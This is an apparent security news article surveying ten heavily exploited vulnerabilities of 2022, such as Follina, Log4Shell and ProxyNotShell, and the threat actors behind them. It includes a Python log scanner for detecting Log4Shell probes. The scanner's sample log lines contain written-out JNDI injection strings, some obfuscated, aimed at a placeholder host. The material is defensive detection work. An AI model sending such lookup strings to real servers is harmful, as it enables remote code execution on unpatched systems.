Top 10 Exploited Vulnerabilities in 2022
With each passing year, hacker attacks become more advanced and sophisticated, so keeping up with security vulnerabilities is now more crucial than ever. This article highlights some of the most dangerous vulnerabilities exploited by malicious actors in 2022.
Follina (CVE-2022-30190)
Disclosed (and patched) in May 2022, CVE-2022-30190 (informally known as “Follina”) is a remote code execution bug in the Microsoft Windows Support Diagnostic Tool (MSDT) that allows a remote attacker to execute arbitrary shell commands on the target system.
Since its public disclosure, security researchers have observed numerous cases of the flaw being exploited, including multiple phishing attacks by Russia-linked threat actors (Sandworm, UAC-0098, APT28) targeting organizations and government agencies in Ukraine in order to infect victims with info-stealing malware, as well as cyber-espionage campaigns aimed at European and US governments. The Follina vulnerability has also been exploited to plant remote access tools like Qbot and AsyncRAT and to deploy backdoors on Windows systems.
Log4Shell (CVE-2021-44228)
Despite being disclosed at the end of 2021, the Log4Shell flaw is still ranked high on the list of the most-exploited vulnerabilities and is still one of the most commonly discussed vulnerabilities among cyber criminals on underground forums.
CVE-2021-44228 is a remote code execution flaw in Apache Log4j, a popular open-source logging utility. By exploiting the flaw, a threat actor can send a specially crafted command to an affected system, execute malicious code, and take over the victim’s machine. Since December 2021, the now-fixed Log4Shell bug has been actively exploited by multiple threat actors, ranging from crypto miners, DDoS botnets, ransomware gangs and initial access brokers to state-backed hackers linked to governments in China, Iran, North Korea, and Turkey.
More recently, threat actors have been observed using Log4Shell to deploy malware on unpatched, public-facing VMware Horizon and Unified Access Gateway servers.
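Log4Shell (CVE-2021-44228) is triggered when an attacker-controlled string containing a `${jndi:...}` lookup reaches Log4j, so a first-line detection is to scan HTTP access logs for such lookups, including the nested-lookup obfuscations attackers used to hide the literal `jndi:` token. The following is an added example, not code from the article; the log lines are constructed and the hosts are placeholders, and the normalizer only collapses the common `${lower:x}`/`${upper:x}` and `${...:-x}` layers.

```python
import re

# Constructed sample access-log lines (not from the article); hosts are placeholders.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://scanner.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:11 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://scanner.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:30 +0000] "GET /x HTTP/1.1" 200 1 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://scanner.example/c}"',
]

# Nested Log4j lookups that were used to hide the literal string "jndi:".
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)  # ${lower:j} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                    # ${::-j} -> j


def normalize(s):
    """Collapse the cheap obfuscation layers, innermost first, until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
    return s.lower()


# After normalization a probe looks like ${jndi:<scheme>:... (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{jndi:[a-z]+:")


def is_log4shell_probe(line):
    """True if the (de-obfuscated) log line carries a JNDI lookup string."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the subset of log lines that should be escalated for review."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print("LOG4SHELL PROBE:", hit)
```

A hit only proves that a probe arrived, not that the target was vulnerable; correlate it with outbound LDAP/RMI connections from the logging host to confirm exploitation.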
Spring4Shell (CVE-2022-22965)
CVE-2022-22965 (Spring4Shell, SpringShell) is a remote code execution vulnerability in Spring Framework, a widely used open source Java framework from VMware; the bug was named after the above-mentioned Log4Shell flaw. Once attackers achieve remote code execution, they can install malware or use the affected server as an initial foothold to escalate privileges and compromise the whole system.
While Spring4Shell is not as widespread as Log4Shell and is not trivial to exploit, organizations shouldn't take it lightly, as it has already been weaponized by cyber criminals to deploy cryptocurrency miners, and by botnets powered by the infamous Mirai malware.
F5 BIG-IP (CVE-2022-1388)
First disclosed in May 2022, CVE-2022-1388 is another critical bug worth paying attention to. The flaw affects the BIG-IP iControl REST authentication component within the F5 BIG-IP suite of software and hardware and, if exploited, allows an unauthenticated attacker to execute commands on BIG-IP network devices with “root” privileges. Over the past months, researchers have spotted multiple attempts to exploit the vulnerability in attacks designed to wipe devices or drop web shells.
Google Chrome zero-day (CVE-2022-0609)
The now patched CVE-2022-0609 is a remote code execution flaw in Google Chrome’s animation component that was leveraged in two separate North Korea-linked hacker campaigns, dubbed “Operation Dream Job” and “Operation AppleJeus”, that targeted several organizations in the media, IT, cryptocurrency, and financial-technology (FinTech) industries located in the United States.
Old but not forgotten: Microsoft Office bug (CVE-2017-11882)
The “ancient” Microsoft Office remote code execution vulnerability (CVE-2017-11882), first disclosed in 2017, still remains among the most talked-about flaws on hacker forums. Although Microsoft released an official patch for CVE-2017-11882 almost five years ago, many organizations still haven’t applied it, presenting an opening for cyber criminals seeking an exploitable foothold. In one recent case, threat actors were observed taking advantage of the unpatched vulnerability to deploy the SmokeLoader malware, which in turn delivers additional malware such as TrickBot.
ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
The moniker “ProxyNotShell” refers to two high-severity vulnerabilities, tracked as CVE-2022-41082 and CVE-2022-41040, that allow a remote user with access to PowerShell Remoting to execute arbitrary code on vulnerable Exchange systems or to carry out SSRF attacks. First disclosed in September 2022, the flaws are said to have been exploited by hackers for several months. Microsoft confirmed that the ProxyNotShell bugs have been used by China-linked state-backed hackers to deploy China Chopper web shells on compromised Exchange servers. Both flaws were addressed as part of the Microsoft November 2022 Patch Tuesday release.
Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
Earlier this year, security researchers brought to public attention two vulnerabilities (CVE-2022-27925, CVE-2022-41352) impacting Zimbra Collaboration Suite (ZCS), a widely used email and collaboration platform. CVE-2022-27925 allows an attacker to achieve remote code execution, while CVE-2022-41352 could be leveraged to upload arbitrary files to vulnerable instances. Between July and October 2022, researchers detected multiple attacks, including by nation-state hackers, leveraging these vulnerabilities to breach thousands of ZCS servers worldwide.
Atlassian Confluence RCE flaw (CVE-2022-26134)
Servers running Atlassian Confluence software are an attractive target for cyber criminals because, if left unpatched, they can provide initial access to a corporate network, so securing them is very important. In June, several botnets, including Kinsing, Hezb, and Dark.IoT, were observed using a remote code execution flaw in Atlassian Confluence (CVE-2022-26134) to deploy cryptomining malware on unpatched installations.
Zyxel RCE vulnerability (CVE-2022-30525)
Another critical bug worth paying attention to is CVE-2022-30525, an OS command injection issue affecting Zyxel firewall and VPN devices for businesses. Successful exploitation of the flaw allows an attacker to inject arbitrary commands remotely without authentication. Given the severity of the security issue and the damage it could lead to, NSA Cybersecurity Director Rob Joyce took to Twitter to warn users about exploitation attempts, urging them to update their Zyxel software if it is vulnerable.